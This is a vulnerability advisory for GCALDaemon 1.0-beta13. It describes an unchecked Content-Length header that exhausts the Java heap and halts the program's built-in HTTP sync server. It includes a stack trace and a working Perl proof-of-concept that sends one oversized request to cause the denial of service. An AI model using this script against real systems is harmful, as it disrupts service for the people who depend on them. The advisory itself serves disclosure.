|
|
|
|
| |
GCALDaemon is "an OS-independent Java program that offers two-way synchronization between Google Calendar and various iCalendar compatible calendar applications. GCALDaemon is primarily designed as a calendar synchronizer but it can also be used as a Gmail notifier, Address Book importer, Gmail terminal and RSS feed converter".
Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars over HTTP, by uploading their file via an HTTP PUT and getting/refreshing their calendar with an HTTP GET. The GCALDaemon's built-in HTTP server keeps this HTTP messages in sync with a specified Google Calendar. An input validation flaw permits to craft an HTTP request with an abnormal content-length value; this malformed request could trigger a denial of service that arises from a Java out of memory fatal error. |
| |
Credit:
The information has been provided by Luca Carettoni.
|
| |
Vulnerable Systems:
* GALDaemon version 1.0-beta13
Using a crafted HTTP request, an attacker could trigger a denial of service that arises from a java.lang.OutOfMemoryError when the Java heap space is overfilled. In the file "org/gcaldaemon/core/http/HTTPListener.java", the GCALDaemon's built-in HTTP server parses the HTTP request and the HTTP header parameters without validation checkpoints. In the line of code "490:org/gcaldaemon/core/http/HTTPListener.java" the "Content-Length" header parameter is used to create a new byte array; when the size of this structure is big enough, it could trigger a Java fatal error that blocks the HTTP daemon:
Exception in thread "HTTP listener" java.lang.OutOfMemoryError: Java heap space
at org.gcaldaemon.core.http.HTTPListener.readRequest(HTTPListener.java:490)
at org.gcaldaemon.core.http.HTTPListener.run(HTTPListener.java:167)
Exploit:
The provided proof-of-concept can trigger the issue.
--------------------------------------------
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp')
or die "error: $!\n";
print "GCALDaemom DoS Expoit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 1000000000\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";
--------------------------------------------
|
|
|
|
|
|
|
|
|
|
